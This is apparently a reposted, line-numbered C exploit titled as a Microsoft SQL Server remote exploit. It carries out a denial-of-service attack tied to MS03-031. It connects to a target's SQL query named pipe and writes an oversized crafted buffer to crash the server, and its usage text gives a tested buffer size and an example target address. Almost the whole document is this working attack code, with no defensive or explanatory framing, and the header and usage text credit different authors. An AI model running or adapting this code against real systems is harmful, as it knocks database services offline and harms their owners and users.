MS Windows Sql Sever Remote Exploit

1. ////////////////////////////////////////////////////////////////
2. //    
3. //      Microsoft SQL Server DoS Remote Exploit
4. //                    By l00ser of st1ks great update
5. //  
6. ////////////////////////////////////////////////////////////////
7.  
8. #include <stdio.h>
9. #include <stdlib.h>
10. #include <windows.h>
11.  
12.  
13. void Usage()
14. {
15.     printf("******************************************\n");
16.     printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n");
17.     printf("\t Written by Refdom\n");
18.     printf("\t Email: refdom xfocus org\n");
19.     printf("\t Homepage: www.xfocus.org\n\n");
20.     printf("Usage: DOSMSSQL.exe server buffersize\n");
21.     printf("eg: DOSMSSQL.exe192.168.0.1 9000\n\n");
22.     printf("The buffersize depends on service pack level.\n");
23.     printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
24.     printf("when buffersize is 9000, the server can be crashed.\n");
25.     printf("\n");
26.     printf("*******************************************\n\n");
27. }
28.  
29.  
30. int main(int argc, char* argv[])
31. {
32.     char lpPipeName[50];
33.     char *lpBuffer = NULL;
34.     unsigned long ulSize = 0;
35.  
36.     BOOL bResult;
37.     DWORD dwWritten = 0, dwMode;
38.     HANDLE hPipe;
39.  
40.     Usage();
41.  
42.     printf("Starting...\n");
43.  
44.     if (argc != 3)
45.         goto Exit0;
46.      
47.     if (strlen(argv[1]) < 20)
48.     {
49.         sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
50.     }
51.     else
52.     {
53.         printf("Error!server\n");
54.         goto Exit0;
55.     }
56.  
57.     ulSize= atol(argv[2]);
58.  
59.     lpBuffer = (char*)malloc(ulSize + 2);
60.     if (NULL == lpBuffer)
61.     {
62.         printf("malloc error!\n");
63.         goto Exit0;
64.     }
65.  
66.     memset(lpBuffer, 0, ulSize + 2);
67.     memset(lpBuffer, 'A', ulSize);
68.     *lpBuffer = '\x12';
69.     *(lpBuffer + 1) = '\x01';
70.     *(lpBuffer + 2) = '\x00';
71.      
72.     printf("Connecting Server...\n");
73.  
74.     hPipe = CreateFile(lpPipeName,
75.                     GENERIC_READ | GENERIC_WRITE,
76.                     0,
77.                     NULL,
78.                     OPEN_EXISTING,
79.                     0,
80.                     NULL);
81.     if (INVALID_HANDLE_VALUE == hPipe)
82.     {
83.         printf("Error!Connect server!%d\n", GetLastError());
84.         goto Exit0;
85.     }
86.  
87.    dwMode = PIPE_READMODE_MESSAGE;
88.    bResult = SetNamedPipeHandleState(
89.       hPipe,    // pipe handle
90.       &dwMode,  // new pipe mode
91.       NULL,     // don't set maximum bytes
92.       NULL);    // don't set maximum time
93.    if (!bResult)
94.    {
95.         printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
96.         goto Exit0;
97.    }
98.  
99.     bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);
100.  
101.     if (!bResult)
102.     {
103.         printf("\n\tError!WriteFile.%d\n\n", GetLastError());
104.         printf("When see the error message, the target may be crashed!!\n\n");
105.         goto Exit0;
106.     }
107.  
108. Exit0:
109.      
110.     return 0;
111. }